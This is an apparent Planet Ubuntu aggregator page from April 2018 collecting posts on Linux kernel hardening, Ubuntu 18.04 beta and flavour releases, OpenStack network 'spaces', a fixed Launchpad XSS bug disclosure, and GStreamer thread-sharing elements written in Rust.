This series took quite a while to land (you can see David’s original patch date as back in June of last year). Partly this was due to having to spend a lot of time researching the code paths so that each whitelist could be explained for commit logs, partly due to making various adjustments from maintainer feedback, and partly due to the short merge window in v4.15 (when it was originally proposed for merging) combined with some last-minute glitches that made Linus nervous. After baking in linux-next for almost two full development cycles, it finally landed. (Though be sure to disable CONFIG_HARDENED_USERCOPY_FALLBACK to gain enforcement of the whitelists — by default it only warns and falls back to the full-object checking.)

automatic stack-protector

While the stack-protector features of the kernel have existed for quite some time, it has never been enabled by default. This was mainly due to needing to evaluate compiler support for the feature, and Kconfig didn’t have a way to check the compiler features before offering CONFIG_* options. As a defense technology, the stack protector is pretty mature. Having it on by default would have greatly reduced the impact of things like the BlueBorne attack (CVE-2017-1000251), as fewer systems would have lacked the defense.

After spending quite a bit of time fighting with ancient compiler versions (*cough*GCC 4.4.4*cough*), I landed CONFIG_CC_STACKPROTECTOR_AUTO, which is default on, and tries to use the stack protector if it is available. The implementation of the solution, however, did not please Linus, though he allowed it to be merged. In the future, Kconfig will gain the knowledge to make better decisions which lets the kernel expose the availability of (the now default) stack protector directly in Kconfig, rather than depending on rather ugly Makefile hacks.

That’s it for now; let me know if you think I should add anything! The v4.17 merge window is open. :)

Edit: added details on ARM register leaks, thanks to Daniel Micay.

© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

on April 13, 2018 12:04 AM

April 12, 2018

S11E06 – Six Feet Over It - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

This week we review the Dell XPS 13 (9370) Developer Edition laptop, bring you some command line lurve and go over all your feedback.

It’s Season 11 Episode 06 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on April 12, 2018 02:15 PM
An old OpenStack network architectureAn old OpenStack network architecture

For past 5-6 years I’ve been in business of deploying cloud solutions for our customers. Vast majority of that was some form of OpenStack, either a simple cloud or a complicated one. But when you think about it – what is a simple cloud? It’s easy to say that small amount of machines makes an easy, and large amount of machines makes a complicated cloud. But, that is not true. Complexity of a typical IaaS solution is pretty much determined by network complexity. Network, in all shapes and forms, from the underlay network to the customer’s overlay network requirements. I’ll try to explain how we deal with the underlay part in this blog.

It’s not a secret that a traditional tree like network architecture just doesn’t work for cloud environments. There are multiple reasons why; it doesn’t scale very well, it requires big OSI layer 2 domains and… well, it’s based on OSI layer 2. Debugging issues on that level is never a joyful experience. Therefore, for IaaS environments one really wants to do a modern design in a form of a spine-leaf architecture. Layer 3 spine-leaf architecture. This allows us to have bunch of smaller layer 2 domains, which then nicely correlate to availability zones, power zones, etc. However, managing environments with multiple layer 2 and therefore even more layer 3 domains requires a bit of rethinking. If we truly want to be effective in deploying and operating a cloud across multiple different layer 2 domains we need to think of the network in a bit more abstract mode. Luckily, this is nothing new.

In traditional approach to network, we talk about TORs, management fabric, BMC/OOB fabric, etc. These are most of the time layer 2 concepts. Fabric, after all, is a collection of switches. But the approach is correct; we should always talk about networks in abstract terms. Instead of talking about subnets and VLANs, we should talk about purpose of the network. This becomes important when we talk about spine-leaf architecture and multiple different subnets that serve the same purpose. In rack 1, subnet 172.16.1.0/24 is management network, but in rack 2, management network is on subnet 192.168.1.0/24, and so on. It’s obvious that it’s much nicer to abstract those subnets into a ‘management network’. Still, nothing new. We do this every day.

So… Why do our tools and applications still require us to use VLANs, subnets and IPs? If we deploy same application across different racks, why do we have to keep separate configurations for each of the units of the same application? What we really want is to have all of our Keystones listening on OpenStack Public API network, and not on subnets 192.168.10.0/24, 192.168.20.0/24 and 192.168.30.0/24. We end up thinking about application on a network, but we configure differently exact copies of the same application (units) on different subnets. Clearly our configuration tools are not doing what we want, but rather forcing us to transform our way of thinking into what those tools need. It’s a paradox that OpenStack is not that complicated, rather it’s made complicated by the tools used to deploy it.

While trying to solve this problem in our deployments at Canonical, we came up with concept of spaces. A space would be this abstracted network that we have in our heads, but somehow fail to put into our tools. Again, spaces are not a revolutionary concept in networking, they have been in our heads all this time. So, how do we implement spaces at Canonical?

We have grown concept of spaces across all of our tooling; MAAS, juju and charms. When we configure MAAS to manage our bare metal machines, we do not define networks as subnets or VLANs, we rather define networks as spaces. A space has a purpose, description and few other attributes. VLANs, and indirectly subnets too, become properties of the space, instead of other way around. This also means that when we deploy a machine, we deploy it connected to a space. When we deploy a machine, we usually do not deploy it on a specific network, but rather with specific requirements; must be able to talk to X, must have Y CPU and Z RAM. If you ever asked yourself why does it take so much time to rack and stack a server, it’s because of this disconnect of what we want and how we handle the configuration.

We’ve also enabled Juju to make this kind of requests – it asks MAAS for machines that is connected to a space, or set of spaces. It then exposes this spaces to charms, so that each charm knows what kind of networks this application has on its disposal. This allows us to do ‘juju deploy keystone –bind public=public-space -n3’; deploy three keystones, connect them to a public-space, a space defined in MAAS. What VLAN will that be, which subnet or an IP, we do not care; the charm will get information from Juju about these “low level” terms (VLANs, IPs). We humans do not think of VLANs and subnets and IPs; at best we think in OSI layer 1 terms.

Sounds a bit complicated? Let’s flip it the other way around. What I can do now is define my application as “3 units of keystone, which use internal network for SQL, public network for exposing API, internal network for OpenStack’s internal communication and is also exposed on OAM network for management purposes” and this is precisely how we deploy OpenStack. In fact, the Juju bundle looks like this:

keystone:
  charm: cs:keystone
  num_units: 3
  bindings:
    "": oam-space
    public: public-space
    internal: internal-space
    shared-db: internal-space

Those who follow OpenStack development will notice that something similar has landed in OpenStack recently; routed provider networks. It’s the same concept, solving the same problem. It’s nice to see how Juju uses this out of the box.

Big thanks to MAAS, Juju, charms and OpenStack communities for doing this. It allowed us to deploy complex applications with a breeze, and therefore shifted our focus to bigger picture, IaaS modeling and some other, new challenges!

on April 12, 2018 04:44 AM

April 11, 2018

Summary

Mohamed Alaa reported that Launchpad’s Bing site search implementation had a cross-site-scripting vulnerability.  This was introduced on 2018-03-29, and fixed on 2018-04-10.  We have not found any evidence of this bug being actively exploited by attackers; the rest of this post is an explanation of the problem for the sake of transparency.

Details

Some time ago, Google announced that they would be discontinuing their Google Site Search product on 2018-04-01.  Since this served as part of the backend for Launchpad’s site search feature (“Search Launchpad” on the front page), we began to look around for a replacement.  We eventually settled on Bing Custom Search, implemented appropriate support in Launchpad, and switched over to it on 2018-03-29.

Unfortunately, we missed one detail.  Google Site Search’s XML API returns excerpts of search results as pre-escaped HTML, using <b> tags to indicate where search terms match.  This makes complete sense given its embedding in XML; it’s hard to see how that API could do otherwise.  The Launchpad integration code accordingly uses TAL code along these lines, using the structure keyword to explicitly indicate that the excerpts in question do not require HTML-escaping (like most good web frameworks, TAL’s default is to escape all variable content, so successful XSS attacks on Launchpad have historically been rare):

<div class="summary" tal:content="structure page/summary" />

However, Bing Custom Search’s JSON API returns excerpts of search results without any HTML escaping.  Again, in the context of the API in question, this makes complete sense as a default behaviour (though a textFormat=HTML switch is available to change this); but, in the absence of appropriate handling, this meant that those excerpts were passed through to the TAL code above without escaping.  As a result, if you could craft search terms that match a portion of an existing page on Launchpad that shows scripting tags (such as a bug about an XSS vulnerability in another piece of software hosted on Launchpad), and convince other people to follow a suitable search link, then you could cause that code to be executed in other users’ browsers.

The fix was, of course, to simply escape the data returned by Bing Custom Search.  Thanks to Mohamed Alaa for their disclosure.

on April 11, 2018 08:40 AM

April 10, 2018

A bunch of Kubernetes developers are doing an Ask Me Anything today on Reddit if you’re interested in asking any questions, hope to see you there!

on April 10, 2018 12:00 AM

April 09, 2018

Here is the second issue of This Week in Lubuntu Development. You can read last week's issue here. Changes General We released 18.04 Final Beta this week. You can find the announcement here. The encrypted LVM bug we described last week has been fixed (thanks to Steve Langasek!). We are still working hard to try […]
on April 09, 2018 04:00 PM

April 08, 2018

In just under 3 weeks, Ubuntu 18.04 LTS launches. This exciting new release is a new Long Term Support release and will introduce many Ubuntu users to GNOME Shell and a closer upstream experience. In addition, Ubuntu developers have been working long and hard to ensure that 18.04 is a big, brilliant release that builds a bridge from 16.04 LTS to a better, bigger platform that can be built upon, without becoming unnecessarily boisterous.

As with each Ubuntu release, 18.04 showcases community artwork with bravado. Thanks to the Ubuntu Free Culture Showcase, we have 12 new wallpapers that will ship with the release:

And since this is an LTS, we’re refreshing the example content on the install media. Not only can you test your graphics and audio hardware for compatibility, but with entertaining media as well:

A big congratulations to the winners, and thanks to everyone who submitted a wallpaper, video entry ,or song. You’ll find this media on your Ubuntu desktop after you upgrade or install Ubuntu 18.04 LTS on April 26th!

on April 08, 2018 07:00 AM

April 06, 2018

The Ubuntu team is pleased to announce the final beta release of the
Ubuntu 18.04 LTS Desktop, Server, and Cloud products.

Codenamed "Bionic Beaver", 18.04 LTS continues Ubuntu's proud tradition
of integrating the latest and greatest open source technologies into a
high-quality, easy-to-use Linux distribution.  The team has been hard
at work through this cycle, introducing new features and fixing bugs.

This beta release includes images from not only the Ubuntu Desktop,
Server, and Cloud products, but also the Kubuntu, Lubuntu, Ubuntu
Budgie, UbuntuKylin, Ubuntu MATE, Ubuntu Studio, and Xubuntu flavours.

The beta images are known to be reasonably free of showstopper CD
build or installer bugs, while representing a very recent snapshot of
18.04 that should be representative of the features intended to ship
with the final release expected on April 26th, 2018.

Ubuntu, Ubuntu Server, Cloud Images:
  Bionic Final Beta includes updated versions of most of our core set
  of packages, including a current 4.15 kernel, and much more.

  To upgrade to Ubuntu 18.04 Final Beta from Ubuntu 17.10, follow these
  instructions:

  https://help.ubuntu.com/community/BionicUpgrades

  The Ubuntu 18.04 Final Beta images can be downloaded at:

  http://releases.ubuntu.com/18.04/ (Ubuntu and Ubuntu Server on x86)

  This Ubuntu Server image features the next generation Subiquity server
  installer, bringing the comfortable live session and speedy install of the
  Ubuntu Desktop to server users at last.

  This new installer does not support the same set of installation options
  as the previous server installer, so the "debian-installer" image
  continues to be made available in parallel.  For more information about
  the installation options, please see:

  https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes#Ubuntu_Server

  Additional images can be found at the following links:

  http://cloud-images.ubuntu.com/daily/server/bionic/current/ (Cloud Images)
  http://cdimage.ubuntu.com/releases/18.04/beta-2/ (Non-x86, and d-i Server)
  http://cdimage.ubuntu.com/netboot/18.04/ (Netboot)

  As fixes will be included in new images between now and release, any
  daily cloud image from today or later (i.e. a serial of 20180404 or
  higher) should be considered a beta image.  Bugs found should be filed
  against the appropriate packages or, failing that, the cloud-images
  project in Launchpad.

  The full release notes for Ubuntu 18.04 Final Beta can be found at:

  https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes

Kubuntu:
  Kubuntu is the KDE based flavour of Ubuntu. It uses the Plasma desktop
  and includes a wide selection of tools from the KDE project.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/kubuntu/releases/18.04/beta-2/

  More information on Kubuntu Final Beta can be found here:
  https://wiki.ubuntu.com/BionicBeaver/Beta2/Kubuntu

Lubuntu:
  Lubuntu is a flavor of Ubuntu that targets to be lighter, less
  resource hungry and more energy-efficient by using lightweight
  applications and LXDE, The Lightweight X11 Desktop Environment,
  as its default GUI.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/lubuntu/releases/18.04/beta-2/

Ubuntu Budgie:
  Ubuntu Budgie is community developed desktop, integrating Budgie
  Desktop Environment with Ubuntu at its core.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntu-budgie/releases/18.04/beta-2/

  More information on Ubuntu Budgie Final Beta can be found here:
  https://ubuntubudgie.org/blog/2018/04/03/18-04-beta-2

UbuntuKylin:
  UbuntuKylin is a flavor of Ubuntu that is more suitable for Chinese
  users.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntukylin/releases/18.04/beta-2/

  More information on UbuntuKylin Final Beta can be found here:
  https://wiki.ubuntu.com/BionicBeaver/Beta2/UbuntuKylin

Ubuntu MATE:
  Ubuntu MATE is a flavor of Ubuntu featuring the MATE desktop
  environment.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntu-mate/releases/18.04/beta-2/

Ubuntu Studio:
  Ubuntu Studio is a flavor of Ubuntu that provides a full range of
  multimedia content creation applications for each key workflows:
  audio, graphics, video, photography and publishing.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/ubuntustudio/releases/18.04/beta-2/

  More information about Ubuntu Studio Final Beta can be found here:
  https://wiki.ubuntu.com/BionicBeaver/Beta2/UbuntuStudio

Xubuntu:
  Xubuntu is a flavor of Ubuntu that comes with Xfce, which is a stable,
  light and configurable desktop environment.

  The Final Beta images can be downloaded at:
  http://cdimage.ubuntu.com/xubuntu/releases/18.04/beta-2/

  More information about Xubuntu Final Beta can be found here:
  http://wiki.xubuntu.org/releases/18.04/release-notes

Regular daily images for Ubuntu, and all flavours, can be found at:
  http://cdimage.ubuntu.com

Ubuntu is a full-featured Linux distribution for clients, servers and
clouds, with a fast and easy installation and regular releases.  A
tightly-integrated selection of excellent applications is included,
and an incredible variety of add-on software is just a few clicks
away.

Professional technical support is available from Canonical Limited and
hundreds of other companies around the world.  For more information
about support, visit http://www.ubuntu.com/support

If you would like to help shape Ubuntu, take a look at the list of
ways you can participate at:
http://www.ubuntu.com/community


Your comments, bug reports, patches and suggestions really help us to
improve this and future releases of Ubuntu.   Instructions can be
found at: https://help.ubuntu.com/community/ReportingBugs

You can find out more about Ubuntu and about this beta release on our
website, IRC channel and wiki.

To sign up for future Ubuntu announcements, please subscribe to
Ubuntu's very low volume announcement list at:

  http://lists.ubuntu.com/mailman/listinfo/ubuntu-announce


https://lists.ubuntu.com/archives/ubuntu-announce/2018-April/000230.html

Originally posted to the Ubuntu Release mailing list on Fri Apr 6 06:02:21 UTC 2018 
by Steve Langasek, on behalf of the Ubuntu Release Team
on April 06, 2018 01:07 PM

Yeah baby! You know you want some of what we've got. Come and have a fling with Ubuntu MATE 18.04 Beta 2.

We are preparing Ubuntu MATE 18.04 (Bionic Beaver) for distribution on April 26th, 2018 With this Beta pre-release, you can see what we are trying out in preparation for our next (stable) version.

Ubuntu MATE 18.04 Beta 2

What works?

People tell us that Ubuntu MATE is stable. You may, or may not, agree.

Ubuntu MATE Beta Releases are NOT recommended for:

  • Regular users who are not aware of pre-release issues
  • Anyone who needs a stable system
  • Anyone uncomfortable running a possibly frequently broken system
  • Anyone in a production environment with data or workflows that need to be reliable

Ubuntu MATE Beta Releases are recommended for:

  • Regular users who want to help us test by finding, reporting, and/or fixing bugs
  • Ubuntu MATE, MATE, and GTK+ developers

What changed since the Ubuntu MATE 17.10 final release?

We've been refining Ubuntu MATE since the 17.10 release and making improvements to ensure that Ubuntu MATE offers what our users want today and what they'll need over the life of this LTS release. This is what's changed since 17.10.

MATE Desktop 1.20

As you may have seen, MATE Desktop 1.20 was released in February 2018 and offers some significant improvements:

  • MATE Desktop 1.20 supports HiDPI displays with dynamic detection and scaling.
    • HiDPI hints for Qt applications are also pushed to the environment to improve cross toolkit integration.
    • Toggling HiDPI modes triggers dynamic resize and scale, no log out/in required.
  • Marco now supports DRI3 and Present, if available.
    • Frame rates in games are significantly increased when using Marco.
  • Marco now supports drag to quadrant window tiling, cursor keys can be used to navigate the Alt + Tab switcher and keyboard shortcuts to move windows to another monitor were added.

If your hardware/drivers support DRI3 then Marco compositing is now hardware accelerated. This dramatically improves 3D rendering performance, particularly in games. If your hardware doesn't support DRI3 then Marco will fallback to a software compositor.

You can read the release announcement to discover everything that improved in MATE Desktop 1.20. It is a significant release that also includes a considerable number of bug fixes.

Since 18.04 beta 1 upstream released MATE Desktop 1.20.1 and the following updates have recently landed in Ubuntu MATE:

  • mate-control-center 1.20.2
  • marco 1.20.1
  • mate-desktop 1.20.1
  • atril 1.20.1
  • mate-power-manager 1.20.1
  • mate-panel 1.20.1
  • mate-settings-daemon 1.20.1
  • pluma 1.20.1
  • mate-applets 1.20.1
  • mate-calc 1.20.1
  • libmatekbd 1.20.1
  • caja 1.20.1
  • mate-sensors-applet 1.20.1

These roll up a collection of fixes, many of which Ubuntu MATE was already carrying patch sets for. The most notable change is that Marco is now fully HiDPI aware and windows controls are scaled correctly.

New and updated desktop layouts - new since 18.04 beta 1

I have decided to add a new layout to the collection available in Ubuntu MATE 18.04. It will be called Familiar and is based on the Traditional layout with the menu-bar (Applications, Places, System) replaced by Brisk Menu. It looks like this:

Familiar

Familiar is now the the default layout, Traditional will continue to be shipped, unchanged, and will be available via MATE Tweak for those who prefer it.

Since 18.04 beta 1 the Netbook layout has been updated, maximised windows now maximise into the top panel like the Mutiny layout. Brisk Menu replaces the custom-menu and mate-dock-applet is used for application pinning and launching. When maximising a window this offers some decent space savings.

Since 18.04 beta 1 the Mutiny layout has been tweaked so the launcher icon is the same size of the docked application icons. We heard you, we understand. It's the little things, right?

Global Menu and MATE HUD

Ubuntu MATE Global Menu

The Global Menu integration is much improved. When the Global Menu is added to a panel the application menus are automatically removed from the application window and only presented globally, no additional configuration (as was the case) is required. Likewise removing the Global Menu from a panel will restore menus to their application windows.

Ubuntu MATE HUD

The HUD now has a 250ms (default) timeout, holding Alt any longer won't trigger the HUD. This is consistent with how the HUD in Unity 7 works. We've fixed a number of issues reported by users of Ubuntu MATE 17.10 regarding the HUD swallowing key presses. The HUD is also HiDPI aware now.

Ubuntu MATE Welcome - new since 18.04 beta 1

Welcome and Boutique have been given some love.

  • The software listings in the Boutique have been refreshed, with some applications being removed, many updated and some new additions.
  • Welcome now has snappier animations and transitions

Indicators by default

Ubuntu MATE 18.04 uses Indicators by default in all layouts. These will be familiar to anyone who has used Unity 7 and offer better accessibility support and ease of use over notification area applets. The volume in Indicator Sound can now be over driven, so it is consistent with the MATE sound preferences. Notification area applets are still supported as a fallback.

Ubuntu MATE HUD

MATE Dock Applet

MATE Dock Applet is used in the Mutiny layout, but anyone can add it to a panel to create custom panel arrangements. The new version adds support for BAMF and icon scrolling.

  • MATE Dock Applet no longer uses its own method of matching icons to applications and instead uses BAMF. What this means for users is that from now on the applet will be a lot better at matching applications and windows to their dock icons.
  • Icon scrolling is useful when the dock has limited space on its panel and will prevent it from expanding over other applets. This addresses an issue reported by several users in Ubuntu MATE 17.10.

Brisk Menu

Brisk Menu Dash Launcher

Many users commented that when using the Mutiny layout the "traditional" menu felt out of place. The Solus Project, the maintainers of Brisk Menu, have add a dash-style launcher at our request. Ubuntu MATE 18.04 includes a patched version of Brisk Menu that includes this new dash launcher. When MATE Tweak is used to enable the Mutiny or Cupertino layout, it now switches on the dash launcher which enables a full screen, searchable, application launcher. Similarly, switching to the other panel layouts restores the more traditional Brisk Menu.

Since 18.04 beta 1 we tweaked the style of the session control buttons in Brisk Menu and those updates will be wait for you are you install Ubuntu MATE 18.04 Beta 2.

MATE Window Applets

The Mutiny and Netbook layouts now integrate the mate-window-applets. You can see these in action alongside an updated Mutiny layout here:

Mutiny undecorated maximised windows

Minimal Installation

If you follow the Ubuntu news closely you may have heard that 18.04 now has a Minimal Install option. Ubuntu MATE was at the front of the queue to take advantage of this new feature.

Minimal Install

The Minimal Install is a new option presented in the installer that will install just the MATE Desktop, its utilities, its themes and Firefox. All the other applications such as office suite, email client, video player, audio manager, etc. are not installed. If you're interested, here is the complete list of software that will not be present on a minimal install of Ubuntu MATE 18.04

So, who's this aimed at? There are users who like to uninstall the software they do not need or want and build out their own desktop experience. So for those users, a minimal install is a great platform to build on. For those of you interested in creating "kiosk" style devices, such as home brew Steam machines or Kodi boxes, then a minimal install is another useful starting point.

MATE Tweak

MATE Tweak can now toggle the HiDPI mode between auto detection, regular scaling and forced scaling. HiDPI mode changes are dynamically applied. MATE Tweak has a deeper understanding of Brisk Menu and Global Menu capabilities and manages them transparently while switching layouts. Switching layouts is far more reliable now too. We've removed the Interface section from MATE Tweak. Sadly all the features the Interface section tweaked have been dropped from GTK3 so are now redundant.

MATE Tweak

We've added the following changes since 18.04 Beta 1

  • Added support for the modifications to the Netbook layout.
  • Added a button to launch the Font preferences so users with HiDPI displays can fine tune their font DPI.
  • When saving a panel layout the Dock status will be saved too.

Caja

We've landed caja-eiciel and caja-seahorse.

  • caja-eiciel - An extension for Caja to edit access control lists (ACLs) and extended attributes (xattr)
  • caja-seahorse - An extension for Caja which allows encryption and decryption of OpenPGP files using GnuPG

Artwork, Fonts & Emoji

Emoji Picker

We are no longer shipping mate-backgrounds by default. They have served us well, but are looking a little stale now. We have created a new selection of high quality wallpapers comprised of some abstract designs and high resolution photos from unsplash.com. The Ubuntu MATE Plymouth theme (boot logo) is now HiDPI aware. Our friends at Ubuntu Budgie have uploaded a new version of Slick Greeter which now fades in smoothly, rather than the stuttering we saw in Ubuntu MATE 17.10. We've switched to Noto Sans for users of Japanese, Chinese and Korean fonts and glyphs. MATE Desktop 1.20 supports emoji input, so we've added a colour emoji font too.

New since 18.04 beta 1 the xcursor themes have been replaced with new cursors from MATE upstream, that also offer HiDPI support.

Raspberry Pi images

We're planning on releasing Ubuntu MATE images for the Raspberry Pi around the time 18.04.1 is released, which should be sometime in July. It takes about a month to get the Raspberry Pi images built and tested and we simply don't have time to do this in time for the April release of 18.04.

Download Ubuntu MATE 18.04 Beta 2

We've even redesigned the download page so it's even easier to get started.

Download

Known Issues

Here are the known issues.

Ubuntu MATE

  • The Desktop Layout button in UBuntu MATE Welcome is extremely unreliable.
    • It is best to pretend you have seen that button and avoid clicking it. It will break your desktop, I promise.
  • Anyone upgrading from Ubuntu MATE 16.04 or newer may need to use MATE Tweak to reset the panel layout to one of the bundled layouts post upgrade.
    • Migrating panel layouts, particularly those without Indicator support, is hit and miss. Mostly miss.

Ubuntu family issues

This is our known list of bugs that affects all flavours.

You'll also want to check the Ubuntu MATE bug tracker to see what has already been reported. These issues will be addressed in due course.

Feedback

Is there anything you can help with or want to be involved in? Maybe you just want to discuss your experiences or ask the maintainers some questions. Please come and talk to us.

on April 06, 2018 08:15 AM

The second beta of the Bionic Beaver (to become 18.04 LTS) has now been released, and is available for download!

This milestone features images for Kubuntu and other Ubuntu flavours.

Pre-releases of the Bionic Beaver are not encouraged for:

  • Anyone needing a stable system
  • Anyone who is not comfortable running into occasional, even frequent breakage.

They are, however, recommended for:

  • Ubuntu flavour developers
  • Those who want to help in testing, reporting, and fixing bugs as we work towards getting this release ready.

Beta 2 includes some software updates that are ready for broader testing. However, it is quite an early set of images, so you should expect some bugs.

You can:

 

on April 06, 2018 06:13 AM

18.04 Beta Release

Ubuntu Studio

Ubuntu Studio 18.04 Bionic Beaver Beta is released! The beta of the upcoming release of Ubuntu Studio 18.04 is ready for testing. You may find the images at cdimage.ubuntu.com/ubuntustudio/releases/bionic/beta-2/. More information can be found in the Beta Release Notes. Reporting Bugs If you find any bugs with this release, please report them, and take your […]
on April 06, 2018 06:04 AM

April 05, 2018

The Xubuntu team are happy to announce the results of the 18.04 community wallpaper contest!

We want to send out a huge thanks to every contestant; last time we had 92 submissions but now you all made us work much harder in picking the best ones out with a total of 162 submissions! Great work! All of the submissions are browsable on the 18.04 contest page at contest.xubuntu.org.

Without further ado, here are the winners:

Note that the images listed above are resized for the website. For the full size images (up to 4K resolution!), make sure you have the package xubuntu-community-wallpapers installed. The package is installed by default in all new Xubuntu 18.04 installations.

on April 05, 2018 10:36 PM

For one of our customers at Centricular we were working on a quite interesting project. Their use-case was basically to receive an as-high-as-possible number of audio RTP streams over UDP, transcode them, and then send them out via UDP again. Due to how GStreamer usually works, they were running into some performance issues.

This blog post will describe the first set of improvements that were implemented for this use-case, together with a minimal benchmark and the results. My colleague Mathieu will follow up with one or two other blog posts with the other improvements and a more full-featured benchmark.

The short version is that CPU usage decreased by about 65-75%, i.e. allowing 3-4x more streams with the same CPU usage. Also parallelization works better and usage of different CPU cores is more controllable, allowing for better scalability. And a fixed, but configurable number of threads is used, which is independent of the number of streams.

The code for this blog post can be found here.

Table of Contents

  1. GStreamer & Threads
  2. Thread-Sharing GStreamer Elements
  3. Available Elements
  4. Little Benchmark
  5. Conclusion

GStreamer & Threads

In GStreamer, by default each source is running from its own OS thread. Additionally, for receiving/sending RTP, there will be another thread in the RTP jitterbuffer, yet another thread for receiving RTCP (another source) and a last thread for sending RTCP at the right times. And RTCP has to be received and sent for the receiver and sender side part of the pipeline, so the number of threads doubles. In the sum this gives at least 1 + 1 + (1 + 1) * 2 = 6 threads per RTP stream in this scenario. In a normal audio scenario, there will be one packet received/sent e.g. every 20ms on each stream, and every now and then an RTCP packet. So most of the time all these threads are only waiting.

Apart from the obvious waste of OS resources (1000 streams would be 6000 threads), this also brings down performance as all the time threads are being woken up. This means that context switches have to happen basically all the time.

To solve this we implemented a mechanism to share threads, and in the end as a result we have a fixed, but configurable number of threads that is independent from the number of streams. And can run e.g. 500 streams just fine on a single thread with a single core, which was completely impossible before. In addition we also did some work to reduce the number of allocations for each packet, so that after startup no additional allocations happen per packet anymore for buffers. See Mathieu’s upcoming blog post for details.

In this blog post, I’m going to write about a generic mechanism for sources, queues and similar elements to share their threads between each other. For the RTP related bits (RTP jitterbuffer and RTCP timer) this was not used due to reuse of existing C codebases.

Thread-Sharing GStreamer Elements

The code in question can be found here, a small benchmark is in the examples directory and it is going to be used for the results later. A full-featured benchmark will come in Mathieu’s blog post.

This is a new GStreamer plugin, written in Rust and around the Tokio crate for asynchronous IO and generally a “task scheduler”.

While this could certainly also have been written in C around something like libuv, doing this kind of work in Rust is simply more productive and fun due to its safety guarantees and the strong type system, which definitely reduced the amount of debugging a lot. And in addition “modern” language features like closures, which make working with futures much more ergonomic.

When using these elements it is important to have full control over the pipeline and its elements, and the dataflow inside the pipeline has to be carefully considered to properly configure how to share threads. For example the following two restrictions should be kept in mind all the time:

  1. Downstream of such an element, the streaming thread must never ever block for considerable amounts of time. Otherwise all other elements inside the same thread-group would be blocked too, even if they could do any work now
  2. This generally all works better in live pipelines, where media is produced in real-time and not as fast as possible

Available Elements

So this repository currently contains the generic infrastructure (see the src/iocontext.rs source file) and a couple of elements:

  • an UDP source: ts-udpsrc, a replacement for udpsrc
  • an app source: ts-appsrc, a replacement for appsrc to inject packets into the pipeline from the application
  • a queue: ts-queue, a replacement for queue that is useful for adding buffering to a pipeline part. The upstream side of the queue will block if not called from another thread-sharing element, but if called from another thread-sharing element it will pause the current task asynchronously. That is, stop the upstream task from producing more data.
  • a proxysink/src element: ts-proxysrc, ts-proxysink, replacements for proxysink/proxysrc for connecting two pipelines with each other. This basically works like the queue, but split into two elements.
  • a tone generator source around spandsp: ts-tonesrc, a replacement for tonegeneratesrc. This also contains some minimal FFI bindings for that part of the spandsp C library.

All these elements have more or less the same API as their non-thread-sharing counterparts.

API-wise, each of these elements has a set of properties for controlling how it is sharing threads with other elements, and with which elements:

  • context: A string that defines in which group this element is. All elements with the same context are running on the same thread or group of threads,
  • context-threads: Number of threads to use in this context. -1 means exactly one thread, 1 and above used N+1 threads (1 thread for polling fds, N worker threads) and 0 sets N to the number of available CPU cores. As long as no considerable work is done in these threads, -1 has shown to be the most efficient. See also this tokio GitHub issue
  • context-wait: Number of milliseconds that the threads will wait on each iteration. This allows to reduce CPU usage even further by handling all events/packets that arrived during that timespan to be handled all at once instead of waking up the thread every time a little event happens, thus reducing context switches again

The elements are all pushing data downstream from a tokio thread whenever data is available, assuming that downstream does not block. If downstream is another thread-sharing element and it would have to block (e.g. a full queue), it instead returns a new future to upstream so that upstream can asynchronously wait on that future before producing more output. By this, back-pressure is implemented between different GStreamer elements without ever blocking any of the tokio threads. All this is implemented around the normal GStreamer data-flow mechanisms, there is no “tokio fast-path” between elements.

Little Benchmark

As mentioned above, there’s a small benchmark application in the examples directory. This basically sets up a configurable number of streams and directly connects them to a fakesink, throwing away all packets. Additionally there is another thread that is sending all these packets. As such, this is really the most basic benchmark and not very realistic but nonetheless it shows the same performance improvement as the real application. Again, see Mathieu’s upcoming blog post for a more realistic and complete benchmark.

When running it, make sure that your user can create enough fds. The benchmark will just abort if not enough fds can be allocated. You can control this with ulimit -n SOME_NUMBER, and allowing a couple of thousands is generally a good idea. The benchmarks below were running with 10000.

After running cargo build –release to build the plugin itself, you can run the benchmark with:

cargo run --release --example udpsrc-benchmark -- 1000 ts-udpsrc -1 1 20

and in another shell the UDP sender with

cargo run --release --example udpsrc-benchmark-sender -- 1000

This runs 1000 streams, uses ts-udpsrc (alternative would be udpsrc), configures exactly one thread -1, 1 context, and a wait time of 20ms. See above for what these settings mean. You can check CPU usage with e.g. top. Testing was done on an Intel i7-4790K, with Rust 1.25 and GStreamer 1.14. One packet is sent every 20ms for each stream.

Source Streams Threads Contexts Wait CPU
udpsrc 1000 1000 x x 44%
ts-udpsrc 1000 -1 1 0 18%
ts-udpsrc 1000 -1 1 20 13%
ts-udpsrc 1000 -1 2 20 15%
ts-udpsrc 1000 2 1 20 16%
ts-udpsrc 1000 2 2 20 27%
Source Streams Threads Contexts Wait CPU
udpsrc 2000 2000 x x 95%
ts-udpsrc 2000 -1 1 20 29%
ts-udpsrc 2000 -1 2 20 31%
Source Streams Threads Contexts Wait CPU
ts-udpsrc 3000 -1 1 20 36%
ts-udpsrc 3000 -1 2 20 47%

Results for 3000 streams for the old udpsrc are not included as starting up that many threads needs too long.

The best configuration is apparently a single thread per context (see this tokio GitHub issue) and waiting 20ms for every iterations. Compared to the old udpsrc, CPU usage is about one third in that setting, and generally it seems to parallelize well. It’s not clear to me why the last test has 11% more CPU with two contexts, while in every other test the number of contexts does not really make a difference, and also not for that many streams in the real test-case.

The waiting does not reduce CPU usage a lot in this benchmark, but on the real test-case it does. The reason is most likely that this benchmark basically sends all packets at once, then waits for the remaining time, then sends the next packets.

